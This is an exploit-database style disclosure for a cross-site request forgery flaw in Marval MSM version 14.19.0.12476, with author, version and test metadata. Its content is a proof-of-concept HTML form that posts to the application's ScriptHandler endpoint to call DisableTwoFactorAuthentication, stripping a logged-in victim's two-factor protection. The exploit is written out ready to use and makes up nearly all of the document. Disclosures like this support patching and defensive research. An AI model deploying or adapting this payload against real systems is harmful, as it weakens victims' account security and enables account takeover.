Marval MSM 14.19.0.12476 Cross Site Request Forgery

# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY# 2FA Bypass:<html>  <body>    <form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">      <input type="submit" value="Submit request" />    </form>  </body></html>